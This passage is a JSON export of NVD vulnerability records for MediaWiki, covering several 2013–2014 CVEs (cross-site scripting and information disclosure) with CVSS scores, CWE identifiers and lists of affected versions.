"2014-05-12T14:55:00", "title": "CVE-2013-6453", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6453"], "modified": "2014-05-13T14:01:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2013-6453", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6453", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via crafted XSL in an SVG file.", "edition": 5, "cvss3": {}, "published": "2014-05-12T14:55:00", "title": "CVE-2013-6452", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6452"], "modified": "2014-05-13T13:36:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2013-6452", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6452", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to obtain information about deleted page via the (1) log API, (2) enhanced RecentChanges, and (3) user watchlists.", "edition": 5, "cvss3": {}, "published": "2014-05-12T14:55:00", "title": "CVE-2013-6472", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6472"], "modified": "2014-05-13T14:43:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.19.6"], "id": "CVE-2013-6472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6472", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_1:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:52:48", "description": "Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 allows remote attackers to inject arbitrary web script or HTML via unspecified CSS values.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-01-28T15:15:00", "title": "CVE-2013-6451", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451"], "modified": "2020-01-30T18:32:00", "cpe": [], "id": "CVE-2013-6451", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6451", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2020-12-09T19:58:22", "description": "Cross-site scripting (XSS) vulnerability in includes/actions/InfoAction.php in MediaWiki before 1.21.9 and 1.22.x before 1.22.6 allows remote attackers to inject arbitrary web script or HTML via the sort key in an info action.", "edition": 5, "cvss3": {}, "published": "2014-04-29T18:55:00", "title": "CVE-2014-2853", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2853"], "modified": "2015-09-10T15:28:00", "cpe": ["cpe:/a:mediawiki:mediawiki:1.14.0", "cpe:/a:mediawiki:mediawiki:1.17", "cpe:/a:mediawiki:mediawiki:1.5.3", "cpe:/a:mediawiki:mediawiki:1.12.4", "cpe:/a:mediawiki:mediawiki:1.7.2", "cpe:/a:mediawiki:mediawiki:1.3.14", "cpe:/a:mediawiki:mediawiki:1.3.10", "cpe:/a:mediawiki:mediawiki:1.8.1", "cpe:/a:mediawiki:mediawiki:1.8.5", "cpe:/a:mediawiki:mediawiki:1.17.3", "cpe:/a:mediawiki:mediawiki:1.20.1", "cpe:/a:mediawiki:mediawiki:1.4.8", "cpe:/a:mediawiki:mediawiki:1.18", "cpe:/a:mediawiki:mediawiki:1.6.9", "cpe:/a:mediawiki:mediawiki:1.3.13", "cpe:/a:mediawiki:mediawiki:1.4.5", "cpe:/a:mediawiki:mediawiki:1.12.0", "cpe:/a:mediawiki:mediawiki:1.3", "cpe:/a:mediawiki:mediawiki:1.21.6", "cpe:/a:mediawiki:mediawiki:1.22.4", "cpe:/a:mediawiki:mediawiki:1.16.2", "cpe:/a:mediawiki:mediawiki:1.20.8", "cpe:/a:mediawiki:mediawiki:1.20.2", "cpe:/a:mediawiki:mediawiki:1.15.3", "cpe:/a:mediawiki:mediawiki:1.20.3", "cpe:/a:mediawiki:mediawiki:1.4.4", "cpe:/a:mediawiki:mediawiki:1.22.2", "cpe:/a:mediawiki:mediawiki:1.3.5", "cpe:/a:mediawiki:mediawiki:1.21.7", "cpe:/a:mediawiki:mediawiki:1.19.9", "cpe:/a:mediawiki:mediawiki:1.1.0", "cpe:/a:mediawiki:mediawiki:1.17.4", "cpe:/a:mediawiki:mediawiki:1.9.1", "cpe:/a:mediawiki:mediawiki:1.13.3", "cpe:/a:mediawiki:mediawiki:1.2.0", "cpe:/a:mediawiki:mediawiki:1.19.0", "cpe:/a:mediawiki:mediawiki:1.5.2", "cpe:/a:mediawiki:mediawiki:1.19.13", "cpe:/a:mediawiki:mediawiki:1.3.15", "cpe:/a:mediawiki:mediawiki:1.9.3", "cpe:/a:mediawiki:mediawiki:1.5.0", "cpe:/a:mediawiki:mediawiki:1.21", "cpe:/a:mediawiki:mediawiki:1.10.3", "cpe:/a:mediawiki:mediawiki:1.2.4", "cpe:/a:mediawiki:mediawiki:1.15.2", "cpe:/a:mediawiki:mediawiki:1.19.2", "cpe:/a:mediawiki:mediawiki:1.3.11", "cpe:/a:mediawiki:mediawiki:1.17.1", "cpe:/a:mediawiki:mediawiki:1.14.1", "cpe:/a:mediawiki:mediawiki:1.21.4", "cpe:/a:mediawiki:mediawiki:1.4.6", "cpe:/a:mediawiki:mediawiki:1.20", "cpe:/a:mediawiki:mediawiki:1.20.6", "cpe:/a:mediawiki:mediawiki:1.15.1", "cpe:/a:mediawiki:mediawiki:1.6.12", "cpe:/a:mediawiki:mediawiki:1.19.4", "cpe:/a:mediawiki:mediawiki:1.5.6", "cpe:/a:mediawiki:mediawiki:1.6.7", "cpe:/a:mediawiki:mediawiki:1.3.9", "cpe:/a:mediawiki:mediawiki:1.6.8", "cpe:/a:mediawiki:mediawiki:1.16.1", "cpe:/a:mediawiki:mediawiki:1.3.1", "cpe:/a:mediawiki:mediawiki:1.8.2", "cpe:/a:mediawiki:mediawiki:1.19.11", "cpe:/a:mediawiki:mediawiki:1.6.2", "cpe:/a:mediawiki:mediawiki:1.9.5", "cpe:/a:mediawiki:mediawiki:1.3.12", "cpe:/a:mediawiki:mediawiki:1.21.3", "cpe:/a:mediawiki:mediawiki:1.8.4", "cpe:/a:mediawiki:mediawiki:1.12.2", "cpe:/a:mediawiki:mediawiki:1.4.2", "cpe:/a:mediawiki:mediawiki:1.5.4", "cpe:/a:mediawiki:mediawiki:1.3.4", "cpe:/a:mediawiki:mediawiki:1.5", "cpe:/a:mediawiki:mediawiki:1.2.5", "cpe:/a:mediawiki:mediawiki:1.3.6", "cpe:/a:mediawiki:mediawiki:1.3.8", "cpe:/a:mediawiki:mediawiki:1.4.9", "cpe:/a:mediawiki:mediawiki:1.5.5", "cpe:/a:mediawiki:mediawiki:1.21.8", "cpe:/a:mediawiki:mediawiki:1.10.1", "cpe:/a:mediawiki:mediawiki:1.3.2", "cpe:/a:mediawiki:mediawiki:1.21.2", "cpe:/a:mediawiki:mediawiki:1.5.8", "cpe:/a:mediawiki:mediawiki:1.19.12", "cpe:/a:mediawiki:mediawiki:1.11.0", "cpe:/a:mediawiki:mediawiki:1.12.1", "cpe:/a:mediawiki:mediawiki:1.4.11", "cpe:/a:mediawiki:mediawiki:1.2.6", "cpe:/a:mediawiki:mediawiki:1.21.1", "cpe:/a:mediawiki:mediawiki:1.22.0", "cpe:/a:mediawiki:mediawiki:1.19.3", "cpe:/a:mediawiki:mediawiki:1.3.0", "cpe:/a:mediawiki:mediawiki:1.19.1", "cpe:/a:mediawiki:mediawiki:1.7.0", "cpe:/a:mediawiki:mediawiki:1.18.3", "cpe:/a:mediawiki:mediawiki:1.2.1", "cpe:/a:mediawiki:mediawiki:1.5.1", "cpe:/a:mediawiki:mediawiki:1.19.8", "cpe:/a:mediawiki:mediawiki:1.20.4", "cpe:/a:mediawiki:mediawiki:1.6.4", "cpe:/a:mediawiki:mediawiki:1.3.7", "cpe:/a:mediawiki:mediawiki:1.15.0", "cpe:/a:mediawiki:mediawiki:1.18.0", "cpe:/a:mediawiki:mediawiki:1.4.3", "cpe:/a:mediawiki:mediawiki:1.17.0", "cpe:/a:mediawiki:mediawiki:1.13.0", "cpe:/a:mediawiki:mediawiki:1.9.0", "cpe:/a:mediawiki:mediawiki:1.11.2", "cpe:/a:mediawiki:mediawiki:1.21.5", "cpe:/a:mediawiki:mediawiki:1.19.7", "cpe:/a:mediawiki:mediawiki:1.13.4", "cpe:/a:mediawiki:mediawiki:1.7.1", "cpe:/a:mediawiki:mediawiki:1.4.7", "cpe:/a:mediawiki:mediawiki:1.6.5", "cpe:/a:mediawiki:mediawiki:1.8.0", "cpe:/a:mediawiki:mediawiki:1.7.3", "cpe:/a:mediawiki:mediawiki:1.6.3", "cpe:/a:mediawiki:mediawiki:1.12.3", "cpe:/a:mediawiki:mediawiki:1.19.5", "cpe:/a:mediawiki:mediawiki:1.20.5", "cpe:/a:mediawiki:mediawiki:1.11.1", "cpe:/a:mediawiki:mediawiki:1.4.1", "cpe:/a:mediawiki:mediawiki:1.9.6", "cpe:/a:mediawiki:mediawiki:1.6.0", "cpe:/a:mediawiki:mediawiki:1.4.13", "cpe:/a:mediawiki:mediawiki:1.9.2", "cpe:/a:mediawiki:mediawiki:1.16.0", "cpe:/a:mediawiki:mediawiki:1.6.11", "cpe:/a:mediawiki:mediawiki:1.6.6", "cpe:/a:mediawiki:mediawiki:1.15.4", "cpe:/a:mediawiki:mediawiki:1.20.7", "cpe:/a:mediawiki:mediawiki:1.10.4", "cpe:/a:mediawiki:mediawiki:1.11", "cpe:/a:mediawiki:mediawiki:1.4.10", "cpe:/a:mediawiki:mediawiki:1.19.10", "cpe:/a:mediawiki:mediawiki:1.18.2", "cpe:/a:mediawiki:mediawiki:1.22.3", "cpe:/a:mediawiki:mediawiki:1.5.7", "cpe:/a:mediawiki:mediawiki:1.4", "cpe:/a:mediawiki:mediawiki:1.9.4", "cpe:/a:mediawiki:mediawiki:1.22.5", "cpe:/a:mediawiki:mediawiki:1.8.3", "cpe:/a:mediawiki:mediawiki:1.15.5", "cpe:/a:mediawiki:mediawiki:1.6.10", "cpe:/a:mediawiki:mediawiki:1.6.1", "cpe:/a:mediawiki:mediawiki:1.3.3", "cpe:/a:mediawiki:mediawiki:1.4.14", "cpe:/a:mediawiki:mediawiki:1.19", "cpe:/a:mediawiki:mediawiki:1.22.1", "cpe:/a:mediawiki:mediawiki:1.17.2", "cpe:/a:mediawiki:mediawiki:1.10.2", "cpe:/a:mediawiki:mediawiki:1.13.1", "cpe:/a:mediawiki:mediawiki:1.2.2", "cpe:/a:mediawiki:mediawiki:1.10.0", "cpe:/a:mediawiki:mediawiki:1.19.6", "cpe:/a:mediawiki:mediawiki:1.2.3", "cpe:/a:mediawiki:mediawiki:1.4.12", "cpe:/a:mediawiki:mediawiki:1.18.1", "cpe:/a:mediawiki:mediawiki:1.13.2", "cpe:/a:mediawiki:mediawiki:1.4.0", "cpe:/a:mediawiki:mediawiki:1.19.14"], "id": "CVE-2014-2853", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2853", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:mediawiki:mediawiki:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.14:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.10:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.14.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta5:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:rc4:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.12.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.12:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.8:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.14.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.22.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.15.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.13.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:beta2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.13:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.11:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17.4:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4:beta6:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.16.1:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.21.6:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.20.5:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.17:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:mediawiki:mediawiki:1.4.13:*:*:*:*:*:*:*", 